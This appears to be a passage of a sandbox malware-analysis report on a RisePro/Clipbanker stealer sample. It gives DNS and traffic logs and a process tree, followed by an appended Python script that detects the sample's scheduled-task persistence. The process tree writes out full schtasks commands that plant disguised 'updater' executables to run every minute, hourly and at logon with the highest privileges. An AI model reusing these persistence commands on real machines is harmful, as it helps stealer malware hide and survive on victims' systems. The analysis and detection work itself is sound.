                    May 17, 2024 23:45:11.555057049 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:11.555068016 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:11.555073977 CEST | 49704 | 50500 | 192.168.2.5 | 5.42.96.65
                    May 17, 2024 23:45:11.555079937 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    May 17, 2024 23:45:11.555093050 CEST | 50500 | 49704 | 5.42.96.65 | 192.168.2.5
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    May 17, 2024 23:45:02.493062973 CEST | 60266 | 53 | 192.168.2.5 | 1.1.1.1
                    May 17, 2024 23:45:02.500276089 CEST | 53 | 60266 | 1.1.1.1 | 192.168.2.5
                    May 17, 2024 23:45:03.675697088 CEST | 60901 | 53 | 192.168.2.5 | 1.1.1.1
                    May 17, 2024 23:45:03.770749092 CEST | 53 | 60901 | 1.1.1.1 | 192.168.2.5
                    May 17, 2024 23:45:17.505036116 CEST | 55501 | 53 | 192.168.2.5 | 1.1.1.1
                    May 17, 2024 23:45:17.515978098 CEST | 53 | 55501 | 1.1.1.1 | 192.168.2.5
                    May 17, 2024 23:45:31.140155077 CEST | 63858 | 53 | 192.168.2.5 | 1.1.1.1
                    May 17, 2024 23:45:31.150041103 CEST | 53 | 63858 | 1.1.1.1 | 192.168.2.5
                    May 17, 2024 23:45:32.140742064 CEST | 53 | 52447 | 162.159.36.2 | 192.168.2.5
                    May 17, 2024 23:45:32.950365067 CEST | 51773 | 53 | 192.168.2.5 | 1.1.1.1
                    May 17, 2024 23:45:32.998289108 CEST | 53 | 51773 | 1.1.1.1 | 192.168.2.5
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    May 17, 2024 23:45:02.493062973 CEST | 192.168.2.5 | 1.1.1.1 | 0xac3f | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
                    May 17, 2024 23:45:03.675697088 CEST | 192.168.2.5 | 1.1.1.1 | 0xf651 | Standard query (0) | db-ip.com | A (IP address) | IN (0x0001) | false
                    May 17, 2024 23:45:17.505036116 CEST | 192.168.2.5 | 1.1.1.1 | 0x6fe6 | Standard query (0) | kuljyftgjk.online | A (IP address) | IN (0x0001) | false
                    May 17, 2024 23:45:31.140155077 CEST | 192.168.2.5 | 1.1.1.1 | 0x6f3b | Standard query (0) | kuljyftgjk.online | A (IP address) | IN (0x0001) | false
                    May 17, 2024 23:45:32.950365067 CEST | 192.168.2.5 | 1.1.1.1 | 0xfa2 | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    May 17, 2024 23:45:02.500276089 CEST | 1.1.1.1 | 192.168.2.5 | 0xac3f | No error (0) | ipinfo.io | | 34.117.186.192 | A (IP address) | IN (0x0001) | false
                    May 17, 2024 23:45:03.770749092 CEST | 1.1.1.1 | 192.168.2.5 | 0xf651 | No error (0) | db-ip.com | | 172.67.75.166 | A (IP address) | IN (0x0001) | false
                    May 17, 2024 23:45:03.770749092 CEST | 1.1.1.1 | 192.168.2.5 | 0xf651 | No error (0) | db-ip.com | | 104.26.5.15 | A (IP address) | IN (0x0001) | false
                    May 17, 2024 23:45:03.770749092 CEST | 1.1.1.1 | 192.168.2.5 | 0xf651 | No error (0) | db-ip.com | | 104.26.4.15 | A (IP address) | IN (0x0001) | false
                    May 17, 2024 23:45:17.515978098 CEST | 1.1.1.1 | 192.168.2.5 | 0x6fe6 | Name error (3) | kuljyftgjk.online | none | none | A (IP address) | IN (0x0001) | false
                    May 17, 2024 23:45:31.150041103 CEST | 1.1.1.1 | 192.168.2.5 | 0x6f3b | Name error (3) | kuljyftgjk.online | none | none | A (IP address) | IN (0x0001) | false
                    May 17, 2024 23:45:32.998289108 CEST | 1.1.1.1 | 192.168.2.5 | 0xfa2 | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                    • https:
                      • ipinfo.io
                    • db-ip.com
                    • 5.42.96.170


                    Target ID:0
                    Start time:17:44:54
                    Start date:17/05/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x1b0000
                    File size:8'778'752 bytes
                    MD5 hash:3D09739846543F4962F2B432DA671C29
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.2157362439.00000000061CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Target ID:3
                    Start time:17:45:15
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
                    Imagebase:0x7ff6d64d0000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:17:45:15
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:17:45:15
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
                    Imagebase:0x1c0000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:6
                    Start time:17:45:15
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:7
                    Start time:17:45:15
                    Start date:17/05/2024
                    Path:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                    Wow64 process (32bit):true
                    Commandline:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 83%, ReversingLabs
                    Reputation:moderate
                    Has exited:true

                    Target ID:8
                    Start time:17:45:16
                    Start date:17/05/2024
                    Path:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                    Wow64 process (32bit):true
                    Commandline:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Author: unknown
                    Reputation:moderate
                    Has exited:true

                    Target ID:9
                    Start time:17:45:16
                    Start date:17/05/2024
                    Path:C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 83%, ReversingLabs
                    Reputation:moderate
                    Has exited:true

                    Target ID:10
                    Start time:17:45:16
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                    Imagebase:0x1c0000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:11
                    Start time:17:45:16
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:12
                    Start time:17:45:17
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                    Imagebase:0x1c0000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:13
                    Start time:17:45:17
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:14
                    Start time:17:45:18
                    Start date:17/05/2024
                    Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 83%, ReversingLabs
                    Reputation:moderate
                    Has exited:false

                    Target ID:15
                    Start time:17:45:18
                    Start date:17/05/2024
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                    Imagebase:0x1c0000
                    File size:187'904 bytes
                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:16
                    Start time:17:45:19
                    Start date:17/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:17
                    Start time:17:45:24
                    Start date:17/05/2024
                    Path:C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 83%, ReversingLabs
                    Has exited:true

                    Target ID:18
                    Start time:17:45:33
                    Start date:17/05/2024
                    Path:C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                    Has exited:true

                    Target ID:19
                    Start time:17:45:41
                    Start date:17/05/2024
                    Path:C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
                    Imagebase:0x400000
                    File size:4'563'640 bytes
                    MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 83%, ReversingLabs
                    Has exited:true
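Added example, not part of the Joe Sandbox report: the schtasks.exe entries above (Targets 3, 5, 10, 12 and 15) are the persistence step of this sample, and the same command lines appear in Sysmon or EDR process-creation telemetry. The script below parses entries in the Key:Value layout used on this page, pulls out every schtasks /create invocation, and states why each one looks like persistence: the /tr action lives under ProgramData or AppData, /rl HIGHEST requests the highest run level, and /sc minute /mo 1 re-launches the payload every minute. It also groups image paths by MD5, which exposes the single Clipbanker binary (AF6E384DFABDAD52D43CF8429AD8779C) that this report shows executing from five different paths. SAMPLE is a constructed abridgement of five entries from this report (other fields dropped); the function names and the USER_WRITABLE path list are my own choices, not anything the report defines.

```python
import re
from collections import defaultdict

# Constructed sample: five process entries abridged from the report above
# (Target IDs, paths, command lines and MD5s as shown there; other fields dropped).
SAMPLE = r"""
Target ID:3
Path:C:\Windows\SysWOW64\schtasks.exe
Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
MD5 hash:48C2FE20575769DE916F48EF0676A965

Target ID:7
Path:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Commandline:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C

Target ID:10
Path:C:\Windows\SysWOW64\schtasks.exe
Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
MD5 hash:48C2FE20575769DE916F48EF0676A965

Target ID:14
Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Commandline:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C

Target ID:17
Path:C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
"""

# Locations a standard user can write to (my own list); a task action here is the
# usual marker of user-level persistence rather than an installed product.
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\")

def parse_entries(text):
    """Split blank-line-separated 'Key:Value' blocks into one dict per process."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        pairs = [line.partition(":") for line in block.splitlines()]
        entries.append({k.strip(): v.strip() for k, sep, v in pairs if sep})
    return entries

def tokenize(cmdline):
    """Windows-style split: a double-quoted run is one token, quotes removed."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

def schtasks_args(cmdline):
    """Map each /switch to the value after it, or True when another switch follows."""
    tokens, args = tokenize(cmdline), {}
    for i, tok in enumerate(tokens):
        if not tok.startswith("/"):
            continue  # a value already consumed by the preceding switch
        nxt = tokens[i + 1] if i + 1 < len(tokens) else "/"
        args[tok.lower()] = True if nxt.startswith("/") else nxt
    return args

def persistence_findings(entries):
    """Return each schtasks /create invocation with the reasons it looks like persistence."""
    findings = []
    for e in entries:
        if not e.get("Path", "").lower().endswith("\\schtasks.exe"):
            continue
        a = schtasks_args(e.get("Commandline", ""))
        if "/create" not in a:
            continue
        action = a.get("/tr") if isinstance(a.get("/tr"), str) else ""
        sc = str(a.get("/sc", "")).upper()
        reasons = []
        if any(part in action.lower() for part in USER_WRITABLE):
            reasons.append("action runs from a user-writable path")
        if str(a.get("/rl", "")).upper() == "HIGHEST":
            reasons.append("task requests the highest run level")
        if sc == "MINUTE" and str(a.get("/mo", "")) == "1":
            reasons.append("re-launches every minute")
        findings.append({"target": e.get("Target ID"), "task_name": a.get("/tn", ""),
                         "action": action, "reasons": reasons,
                         "schedule": sc + (f" /mo {a['/mo']}" if "/mo" in a else "")})
    return findings

def copies_by_hash(entries):
    """Group executed image paths by MD5: one hash under several names is a dropper tell."""
    by_hash = defaultdict(set)
    for e in entries:
        if "MD5 hash" in e and "Path" in e:
            by_hash[e["MD5 hash"].upper()].add(e["Path"])
    return {h: sorted(paths) for h, paths in by_hash.items()}

if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    for f in persistence_findings(ents):
        print(f"Target {f['target']}: {f['task_name']!r} -> {f['action']} [{f['schedule']}]")
        for r in f["reasons"]:
            print("    -", r)
    for h, paths in copies_by_hash(ents).items():
        if len(paths) > 1:
            print(f"{h} ran from {len(paths)} distinct paths: {paths}")
```

Run it as a script to print the two findings and the multi-path hash. The switch parsing works unchanged on the Commandline field of a process-creation event, because /create, /tr, /tn, /sc, /mo, /rl and /ru are the switches schtasks itself accepts; note that Target 10's command line on this page starts with /C rather than schtasks, so the check keys on /create rather than on argv[0]. One caveat when turning this into a rule: /rl HIGHEST only grants what the creating context can grant, so the same command line from an unelevated process (Target 15 here) yields a task that runs at the user's own level, but it is still the same persistence attempt and should still fire.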

                    No disassembly